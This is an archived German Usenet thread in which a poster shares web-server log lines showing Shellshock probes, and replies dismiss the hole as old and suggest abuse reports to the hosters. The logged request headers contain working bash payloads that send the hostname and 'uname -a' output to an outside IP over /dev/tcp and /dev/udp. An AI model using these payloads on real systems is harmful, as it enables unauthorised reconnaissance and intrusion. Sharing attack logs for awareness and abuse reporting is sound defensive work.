Discussion:
aktuelle rootkit-virus scanner (hacking/hacker bots)
(zu alt für eine Antwort)
DHPoster
2015-03-09 22:14:23 UTC
Permalink
Hacker:
----------
62.193.193.198
vds-992398.amen-pro.com - - [08/Mar/2015:23:50:21 +0100] "GET
/cgi-sys/php5 HTTP/1.1" 403 10069 "() { :;}; /bin/bash -c \"echo

vds-992398.amen-pro.com/cgi-sys/php5 > /dev/tcp/62.193.192.103/23;
/bin/uname -a > /dev/tcp/62.193.192.103/23; echo
vds-992398.amen-pro.com/cgi-sys/php5 >

/dev/udp/62.193.192.103/80\"" "() { :;}; /bin/bash -c \"echo
vds-992398.amen-pro.com/cgi-sys/php5 > /dev/tcp/62.193.192.103/23;
/bin/uname -a >

/dev/tcp/62.193.192.103/23; echo vds-992398.amen-pro.com/cgi-sys/php5 >
/dev/udp/62.193.192.103/80\"

----------
s15751196.onlinehome-server.info - - [08/Mar/2015:22:58:09 +0100] "GET
/cgi-sys/php4 HTTP/1.1" 403 10069 "() { :;}; /bin/bash -c \"echo

s15751196.onlinehome-server.info/cgi-sys/php4 >
/dev/tcp/62.193.192.103//23; /bin/uname -a >
/dev/tcp/62.193.192.103//23; echo
s15751196.onlinehome-server.info/cgi-sys/php4 >

/dev/udp/62.193.192.103/80\"" "() { :;}; /bin/bash -c \"echo
s15751196.onlinehome-server.info/cgi-sys/php4 >
/dev/tcp/62.193.192.103//23; /bin/uname -a >

/dev/tcp/62.193.192.103//23; echo
s15751196.onlinehome-server.info/cgi-sys/php4 > /dev/udp/62.193.192.103/80\"
----------


http://www.budich.org/public/hakker2.htm
Juergen P. Meier
2015-03-10 05:38:04 UTC
Permalink
Post by DHPoster
----------
62.193.193.198
vds-992398.amen-pro.com - - [08/Mar/2015:23:50:21 +0100] "GET
/cgi-sys/php5 HTTP/1.1" 403 10069 "() { :;}; /bin/bash -c \"echo
*Gaehn* Sicherheitsluecke von vorgestern (letztes Jahr).
Post by DHPoster
vds-992398.amen-pro.com/cgi-sys/php5 > /dev/tcp/62.193.192.103/23;
/bin/uname -a > /dev/tcp/62.193.192.103/23; echo
vds-992398.amen-pro.com/cgi-sys/php5 >
[WERBUNG ENTSORGT]
Solltest du nicht lieber einen Abuse-Report direkt an AMEN schicken?
Jens Hektor
2015-03-10 09:30:57 UTC
Permalink
Post by Juergen P. Meier
Post by DHPoster
----------
62.193.193.198
vds-992398.amen-pro.com - - [08/Mar/2015:23:50:21 +0100] "GET
/cgi-sys/php5 HTTP/1.1" 403 10069 "() { :;}; /bin/bash -c \"echo
*Gaehn* Sicherheitsluecke von vorgestern (letztes Jahr).
Post by DHPoster
vds-992398.amen-pro.com/cgi-sys/php5 > /dev/tcp/62.193.192.103/23;
/bin/uname -a > /dev/tcp/62.193.192.103/23; echo
vds-992398.amen-pro.com/cgi-sys/php5 >
[WERBUNG ENTSORGT]
Solltest du nicht lieber einen Abuse-Report direkt an AMEN schicken?
Nun ja, Werbung hin oder her, der onlinehome-server spielt da auch mit.

Ob als forwarder oder weil auch zerlegt, an 1&1 kann man auch 'ne Meldung schicken.
Loading...